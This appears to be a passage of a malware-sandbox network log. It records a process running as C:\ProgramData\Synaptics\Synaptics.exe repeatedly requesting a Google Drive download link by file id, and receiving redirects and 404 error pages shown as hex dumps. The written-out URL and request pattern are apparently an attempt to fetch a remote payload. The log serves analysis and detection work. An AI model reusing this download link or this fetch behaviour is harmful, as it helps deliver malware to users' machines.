                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:19 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:08:20 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:20 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-kxh4knhtBW8pbz_kK_reQA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                43192.168.2.449954142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:22 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:08:23 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:23 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-ThLGAaDaYyEPc01R8L4VAw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                44192.168.2.449955142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:22 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:08:23 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:23 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-0GnnUmKFuAzeQgDha21wiA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                45192.168.2.449953142.250.181.974436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:22 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                                                                                                                                                2024-12-25 08:08:23 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                X-GUploader-UploadID: AFiumC46zEPSxOXnJtWRuxBmoPvCgz0JpN_GrTo3Gi877QCbuy14KGjfx15jolvfv1M3Ecmu1BCtmzY
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:23 GMT
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-qQeMKvbM7tZEbPylnYa-ug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Content-Length: 1652
                                                                                                                                                                Server: UploadServer
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                Connection: close
                                                                                                                                                                2024-12-25 08:08:23 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                2024-12-25 08:08:23 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 50 43 52 45 42 78 6a 6a 49 39 38 32 38 4b 68 70 2d 63 36 33 62 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                Data Ascii: 404 (Not Found)!!1</title><style nonce="PCREBxjjI9828Khp-c63bg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                2024-12-25 08:08:23 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                46192.168.2.449956142.250.181.974436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:22 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                                                                                                                                                2024-12-25 08:08:23 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                X-GUploader-UploadID: AFiumC4_VHd_DHUS-yvVglPwMuVHfMUwJxmocH_T_G-zVvfG3_xIUFRAIxrGCQZ1etoasOhx
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:23 GMT
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-_bfRP3NYFEcC_-4xr6hsDA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Content-Length: 1652
                                                                                                                                                                Server: UploadServer
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                Connection: close
                                                                                                                                                                2024-12-25 08:08:23 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                2024-12-25 08:08:23 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 45 35 31 35 2d 55 6c 65 30 78 43 69 70 56 54 4b 62 68 6f 2d 76 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                Data Ascii: t Found)!!1</title><style nonce="E515-Ule0xCipVTKbho-vA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                2024-12-25 08:08:23 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                47192.168.2.449969142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:25 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:08:26 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:26 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-fbESnhrO3t365r2Z2CD4ww' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                48192.168.2.449970142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:25 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:08:26 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:26 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-v7W6HZAwFp6OfT5z6Z8UNA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                49192.168.2.449981142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:28 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:08:29 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:28 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-PraN2uot2P5iROHWHSJsiw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                50192.168.2.449983142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:28 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:08:29 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:29 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-sc3fVHBEKJgKppc9Wz3NMw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                51192.168.2.449982142.250.181.974436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:28 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
